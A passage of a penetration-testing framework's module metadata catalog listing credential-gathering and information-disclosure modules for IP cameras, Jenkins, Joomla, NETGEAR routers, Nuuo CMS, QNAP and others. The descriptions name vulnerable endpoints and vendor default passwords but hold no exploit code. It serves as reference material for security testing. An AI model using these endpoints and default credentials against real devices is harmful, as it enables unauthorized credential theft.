"auxiliary_gather/ipcamera_password_disclosure": {
"name": "JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure",
"full_name": "auxiliary/gather/ipcamera_password_disclosure",
"rank": 300,
"disclosure_date": "2016-08-16",
"type": "auxiliary",
"author": [
"Yakir Wizman",
"h00die"
],
"description": "SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),\n and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)\n allow an unauthenticated user to disclose the username & password by\n requesting the javascript page 'readfile.cgi?query=ADMINID'.\n Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235",
"references": [
"EDB-40254",
"EDB-40263",
"EDB-40264"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-07 15:14:13 +0000",
"path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/ipcamera_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/java_rmi_registry": {
"name": "Java RMI Registry Interfaces Enumeration",
"full_name": "auxiliary/gather/java_rmi_registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module gathers information from an RMI endpoint running an RMI registry\n interface. It enumerates the names bound in a registry and looks up each\n remote reference.",
"references": [
"URL-http://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/java_rmi_registry.rb",
"is_install_path": true,
"ref_name": "gather/java_rmi_registry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/jenkins_cred_recovery": {
"name": "Jenkins Domain Credential Recovery",
"full_name": "auxiliary/gather/jenkins_cred_recovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Th3R3p0",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Jenkins domain credentials, and uses\n the script console to decrypt each password if anonymous permission\n is allowed.\n\n It has been tested against Jenkins version 1.590, 1.633, and 1.638.",
"references": [
"EDB-38664",
"URL-http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/jenkins_cred_recovery.rb",
"is_install_path": true,
"ref_name": "gather/jenkins_cred_recovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_com_realestatemanager_sqli": {
"name": "Joomla Real Estate Manager Component Error-Based SQL Injection",
"full_name": "auxiliary/gather/joomla_com_realestatemanager_sqli",
"rank": 300,
"disclosure_date": "2015-10-22",
"type": "auxiliary",
"author": [
"Omer Ramic",
"Nixawk"
],
"description": "This module exploits a SQL injection vulnerability in Joomla Plugin\n com_realestatemanager version 3.7 in order to enumerate\n usernames and password hashes.",
"references": [
"EDB-38445"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_com_realestatemanager_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_contenthistory_sqli": {
"name": "Joomla com_contenthistory Error-Based SQL Injection",
"full_name": "auxiliary/gather/joomla_contenthistory_sqli",
"rank": 300,
"disclosure_date": "2015-10-22",
"type": "auxiliary",
"author": [
"Asaf Orpani",
"bperry",
"Nixawk"
],
"description": "This module exploits a SQL injection vulnerability in Joomla versions 3.2\n through 3.4.4 in order to enumerate usernames and password hashes.",
"references": [
"CVE-2015-7297",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_contenthistory_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_contenthistory_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_weblinks_sqli": {
"name": "Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/joomla_weblinks_sqli",
"rank": 300,
"disclosure_date": "2014-03-02",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection\n which allows an attacker to access the database or read arbitrary files as the\n 'mysql' user. This module will only work if the mysql user Joomla is using\n to access the database has the LOAD_FILE permission.",
"references": [
"EDB-31459",
"URL-http://developer.joomla.org/security/578-20140301-core-sql-injection.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_weblinks_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/kerberos_enumusers": {
"name": "Kerberos Domain User Enumeration",
"full_name": "auxiliary/gather/kerberos_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n the different responses returned by the service for valid and invalid users.",
"references": [
"URL-https://nmap.org/nsedoc/scripts/krb5-enum-users.html"
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
"is_install_path": true,
"ref_name": "gather/kerberos_enumusers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/konica_minolta_pwd_extract": {
"name": "Konica Minolta Password Extractor",
"full_name": "auxiliary/gather/konica_minolta_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module will extract FTP and SMB account usernames and passwords\n from Konica Minolta multifunction printer (MFP) devices. Tested models include\n C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.",
"references": [
],
"platform": "",
"arch": "",
"rport": "50001",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
"is_install_path": true,
"ref_name": "gather/konica_minolta_pwd_extract",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/lansweeper_collector": {
"name": "Lansweeper Credential Collector",
"full_name": "auxiliary/gather/lansweeper_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sghctoma <tamas.szakaly@praudit.hu>",
"eq <balazs.bucsay@praudit.hu>",
"calderpwn <calderon@websec.mx>"
],
"description": "Lansweeper stores the credentials it uses to scan the computers\n in its Microsoft SQL database. The passwords are XTea-encrypted with a\n 68 character long key, in which the first 8 characters are stored with\n the password in the database and the other 60 are static. Lansweeper, by\n default, creates an MSSQL user \"lansweeperuser\" with the password\n \"mysecretpassword0*\", and stores its data in a database called\n \"lansweeperdb\". This module will query the MSSQL database for the\n credentials.",
"references": [
"URL-http://www.lansweeper.com",
"URL-http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/lansweeper_collector.rb",
"is_install_path": true,
"ref_name": "gather/lansweeper_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mantisbt_admin_sqli": {
"name": "MantisBT Admin SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/mantisbt_admin_sqli",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Jakub Galczyk",
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if\n an attacker can gain access to administrative credentials.\n\n This vuln was fixed in 1.2.17.",
"references": [
"CVE-2014-2238",
"URL-http://www.mantisbt.org/bugs/view.php?id=17055"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mantisbt_admin_sqli.rb",
"is_install_path": true,
"ref_name": "gather/mantisbt_admin_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/mcafee_epo_xxe": {
"name": "McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure",
"full_name": "auxiliary/gather/mcafee_epo_xxe",
"rank": 300,
"disclosure_date": "2015-01-06",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module will exploit an authenticated XXE vulnerability to read the keystore.properties\n off of the filesystem. This properties file contains an encrypted password that is set during\n installation. What is interesting about this password is that it is set as the same password\n as the database 'sa' user and of the admin user created during installation. This password\n is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,\n if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.\n\n Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server\n user in order to achieve remote command execution with permissions of the database process. If\n the administrator has not changed the password for the initially created account since installation,\n the attacker will have the password for this account. By default, 'admin' is recommended.\n\n Any user account can be used to exploit this, all that is needed is a valid credential.\n\n The most data that can be successfully retrieved is 255 characters due to length restrictions\n on the field used to perform the XXE attack.",
"references": [
"CVE-2015-0921",
"CVE-2015-0922",
"URL-https://seclists.org/fulldisclosure/2015/Jan/8"
],
"platform": "",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/mcafee_epo_xxe.rb",
"is_install_path": true,
"ref_name": "gather/mcafee_epo_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/memcached_extractor": {
"name": "Memcached Extractor",
"full_name": "auxiliary/gather/memcached_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Paul Deardorff <paul_deardorff@rapid7.com>"
],
"description": "This module extracts the slabs from a memcached instance. It then\n finds the keys and values stored in those slabs.",
"references": [
"URL-https://github.com/memcached/memcached/blob/master/doc/protocol.txt"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/memcached_extractor.rb",
"is_install_path": true,
"ref_name": "gather/memcached_extractor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mongodb_js_inject_collection_enum": {
"name": "MongoDB NoSQL Collection Enumeration Via Injection",
"full_name": "auxiliary/gather/mongodb_js_inject_collection_enum",
"rank": 300,
"disclosure_date": "2014-06-07",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module can exploit NoSQL injections on MongoDB versions less than 2.4\n and enumerate the collections available in the data via boolean injections.",
"references": [
"URL-http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb",
"is_install_path": true,
"ref_name": "gather/mongodb_js_inject_collection_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ms14_052_xmldom": {
"name": "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
"full_name": "auxiliary/gather/ms14_052_xmldom",
"rank": 300,
"disclosure_date": "2014-09-09",
"type": "auxiliary",
"author": [
"Soroush Dalili",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.\n It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you\n must supply your own list of file paths. Each file path should look like this:\n c:\\\\windows\\\\system32\\\\calc.exe",
"references": [
"CVE-2013-7331",
"MSB-MS14-052",
"URL-https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/",
"URL-https://www.alienvault.com/open-threat-exchange/blog/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ms14_052_xmldom.rb",
"is_install_path": true,
"ref_name": "gather/ms14_052_xmldom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mybb_db_fingerprint": {
"name": "MyBB Database Fingerprint",
"full_name": "auxiliary/gather/mybb_db_fingerprint",
"rank": 300,
"disclosure_date": "2014-02-13",
"type": "auxiliary",
"author": [
"Arthur Karmanovskii <fnsnic@gmail.com>"
],
"description": "This module checks if MyBB is running behind a URL. It also uses a malformed query to\n force an error and fingerprint the backend database used by MyBB on version 1.6.12\n and prior.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mybb_db_fingerprint.rb",
"is_install_path": true,
"ref_name": "gather/mybb_db_fingerprint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/natpmp_external_address": {
"name": "NAT-PMP External Address Scanner",
"full_name": "auxiliary/gather/natpmp_external_address",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Scan NAT devices for their external address using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/natpmp_external_address.rb",
"is_install_path": true,
"ref_name": "gather/natpmp_external_address",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/netgear_password_disclosure": {
"name": "NETGEAR Administrator Password Disclosure",
"full_name": "auxiliary/gather/netgear_password_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Simon Kenin",
"thecarterb"
],
"description": "This module will collect the password for the `admin` user.\n The exploit will not complete if password recovery is set on the router.\n The password is received by passing the token generated from `unauth.cgi`\n to `passwordrecovered.cgi`. This exploit works on many different NETGEAR\n products. The full list of affected products is available in the 'References'\n section.",
"references": [
"CVE-2017-5521",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911",
"URL-http://thehackernews.com/2017/01/Netgear-router-password-hacking.html",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/",
"URL-http://pastebin.com/dB4bTgxz",
"EDB-41205"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/netgear_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/netgear_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nis_bootparamd_domain": {
"name": "NIS bootparamd Domain Name Disclosure",
"full_name": "auxiliary/gather/nis_bootparamd_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SATAN",
"pentestmonkey",
"wvu <wvu@metasploit.com>"
],
"description": "This module discloses the NIS domain name from bootparamd.\n\n You must know a client address from the target's bootparams file.\n\n Hint: try hosts within the same network range as the target.",
"references": [
"URL-https://tools.ietf.org/html/rfc1831",
"URL-https://tools.ietf.org/html/rfc4506",
"URL-http://pentestmonkey.net/blog/nis-domain-name"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-13 22:55:01 +0000",
"path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
"is_install_path": true,
"ref_name": "gather/nis_bootparamd_domain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nis_ypserv_map": {
"name": "NIS ypserv Map Dumper",
"full_name": "auxiliary/gather/nis_ypserv_map",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module dumps the specified map from NIS ypserv.\n\n The following examples are from ypcat -x:\n\n Use \"ethers\" for map \"ethers.byname\"\n Use \"aliases\" for map \"mail.aliases\"\n Use \"services\" for map \"services.byname\"\n Use \"protocols\" for map \"protocols.bynumber\"\n Use \"hosts\" for map \"hosts.byname\"\n Use \"networks\" for map \"networks.byaddr\"\n Use \"group\" for map \"group.byname\"\n Use \"passwd\" for map \"passwd.byname\"\n\n You may specify a map by one of the nicknames above.",
"references": [
"URL-https://tools.ietf.org/html/rfc1831",
"URL-https://tools.ietf.org/html/rfc4506"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-13 22:55:01 +0000",
"path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
"is_install_path": true,
"ref_name": "gather/nis_ypserv_map",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nuuo_cms_bruteforce": {
"name": "Nuuo Central Management Server User Session Token Bruteforce",
"full_name": "auxiliary/gather/nuuo_cms_bruteforce",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Nuuo Central Management Server below version 2.4 has a flaw where it sends the\n heap address of the user object instead of a real session number when a user logs\n in. This can be used to reduce the keyspace for the session number from 10 million\n to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.\n This module does exactly that - it uses a computed occurrence table to try the most common\n combinations up to 1.2 million to try to guess a valid user session.\n This session number can then be used to achieve code execution or download files - see\n the other Nuuo CMS auxiliary and exploit modules.\n Note that for this to work a user has to be logged into the system.",
"references": [
"CVE-2018-17888",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-24 07:01:42 +0000",
"path": "/modules/auxiliary/gather/nuuo_cms_bruteforce.rb",
"is_install_path": true,
"ref_name": "gather/nuuo_cms_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nuuo_cms_file_download": {
"name": "Nuuo Central Management Server Authenticated Arbitrary File Download",
"full_name": "auxiliary/gather/nuuo_cms_file_download",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The Nuuo Central Management Server allows an authenticated user to download files from the\n installation folder. This functionality can be abused to obtain administrative credentials,\n the SQL Server database password and arbitrary files off the system with directory traversal.\n The module will attempt to download CMServer.cfg (the user configuration file with all the user\n passwords including the admin one), ServerConfig.cfg (the server configuration file with the\n SQL Server password) and a third file if the FILE argument is provided by the user.\n The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules\n included in Metasploit, these files cannot be decrypted programmatically. The user will\n have to open them with zip or a similar program and provide the default password \"NUCMS2007!\".\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n All versions of CMS server up to and including 3.5 are vulnerable to this attack.",
"references": [
"CVE-2018-17934",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-19 14:26:35 +0000",
"path": "/modules/auxiliary/gather/nuuo_cms_file_download.rb",
"is_install_path": true,
"ref_name": "gather/nuuo_cms_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/opennms_xxe": {
"name": "OpenNMS Authenticated XXE",
"full_name": "auxiliary/gather/opennms_xxe",
"rank": 300,
"disclosure_date": "2015-01-08",
"type": "auxiliary",
"author": [
"Stephen Breen <breenmachine@gmail.com>",
"Justin Kennedy <jstnkndy@gmail.com>"
],
"description": "OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.\n Although this attack requires authentication, there are several factors that increase the\n severity of this vulnerability.\n\n 1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: \"The difficulty with the\n core of OpenNMS is that these components need to run as root to be able to bind to low-numbered\n ports or generate network traffic that requires root\"\n\n 2. The user that you must authenticate as is the \"rtc\" user which has the default password of\n \"rtc\". There is no mention of this user in the installation guides found here:\n http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default\n admin password of \"admin\" for security purposes.",
"references": [
"CVE-2015-0975"
],
"platform": "",
"arch": "",
"rport": 8980,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/opennms_xxe.rb",
"is_install_path": true,
"ref_name": "gather/opennms_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/pimcore_creds_sqli": {
"name": "Pimcore Gather Credentials via SQL Injection",
"full_name": "auxiliary/gather/pimcore_creds_sqli",
"rank": 300,
"disclosure_date": "2018-08-13",
"type": "auxiliary",
"author": [
"Thongchai Silpavarangkura",
"N. Rai-Ngoen",
"Shelby Pace"
],
"description": "This module extracts the usernames and hashed passwords of all users of\n the Pimcore web service by exploiting a SQL injection vulnerability in\n Pimcore's REST API.\n\n Pimcore begins to create password hashes by concatenating a user's\n username, the name of the application, and the user's password in the\n format USERNAME:pimcore:PASSWORD.\n\n The resulting string is then used to generate an MD5 hash, and then that\n MD5 hash is used to create the final hash, which is generated using\n PHP's built-in password_hash function.",
"references": [
"CVE-2018-14058",
"EDB-45208"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-27 12:31:04 +0000",
"path": "/modules/auxiliary/gather/pimcore_creds_sqli.rb",
"is_install_path": true,
"ref_name": "gather/pimcore_creds_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"ioc-in-logs"
]
}
},
"auxiliary_gather/qnap_backtrace_admin_hash": {
"name": "QNAP NAS/NVR Administrator Hash Disclosure",
"full_name": "auxiliary/gather/qnap_backtrace_admin_hash",
"rank": 300,
"disclosure_date": "2017-01-31",
"type": "auxiliary",
"author": [
"bashis",
"wvu <wvu@metasploit.com>",
"Donald Knuth"
],
"description": "This module exploits combined heap and stack buffer overflows for QNAP\n NAS and NVR devices to dump the admin (root) shadow hash from memory via\n an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.\n\n A binary search is performed to find the correct offset for the BOFs.\n Since the server forks, blind remote exploitation is possible, provided\n the heap does not have ASLR.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Feb/2",
"URL-https://en.wikipedia.org/wiki/Binary_search_algorithm"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb",
"is_install_path": true,
"ref_name": "gather/qnap_backtrace_admin_hash",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/rails_doubletap_file_read": {
"name": "Ruby On Rails File Content Disclosure ('doubletap')",
"full_name": "auxiliary/gather/rails_doubletap_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carter Brainerd <0xCB@protonmail.com>",
"John Hawthorn <john@hawthorn.email>"
],
"description": "This module uses a path traversal vulnerability in Ruby on Rails\n versions <= 5.2.2 to read files on a target server.",
"references": [
"URL-https://hackerone.com/reports/473888",
"URL-https://github.com/mpgn/Rails-doubletap-RCE",
"URL-https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q",
"URL-https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/",
"CVE-2019-5418",
"EDB-46585"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-21 12:00:20 +0000",
"path": "/modules/auxiliary/gather/rails_doubletap_file_read.rb",
"is_install_path": true,
"ref_name": "gather/rails_doubletap_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DoubleTap"
]
}
},
"auxiliary_gather/safari_file_url_navigation": {
"name": "Mac OS X Safari file:// Redirection Sandbox Escape",
"full_name": "auxiliary/gather/safari_file_url_navigation",
"rank": 300,
"disclosure_date": "2014-01-16",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a\n \"state management issue\" that allows a browser window to be navigated\n to a file:// URL. By dropping and loading a malicious .webarchive file,\n an attacker can read arbitrary files, inject cross-domain Javascript, and\n silently install Safari extensions.",
"references": [
"ZDI-15-228",
"CVE-2015-1155",
"URL-https://support.apple.com/en-us/HT204826"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/safari_file_url_navigation.rb",
"is_install_path": true,
"ref_name": "gather/safari_file_url_navigation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/samsung_browser_sop_bypass": {
"name": "Samsung Internet Browser SOP Bypass",
"full_name": "auxiliary/gather/samsung_browser_sop_bypass",
"rank": 300,
"disclosure_date": "2017-11-08",
"type": "auxiliary",
"author": [
"Dhiraj Mishra",
"Tod Beardsley",
"Jeffrey Martin"
],
"description": "This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the\n Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.\n By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather\n credentials via a fake pop-up.",
"references": [
"CVE-2017-17692",
"URL-http://fr.0day.today/exploit/description/28434"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-16 22:10:02 +0000",
"path": "/modules/auxiliary/gather/samsung_browser_sop_bypass.rb",
"is_install_path": true,
"ref_name": "gather/samsung_browser_sop_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
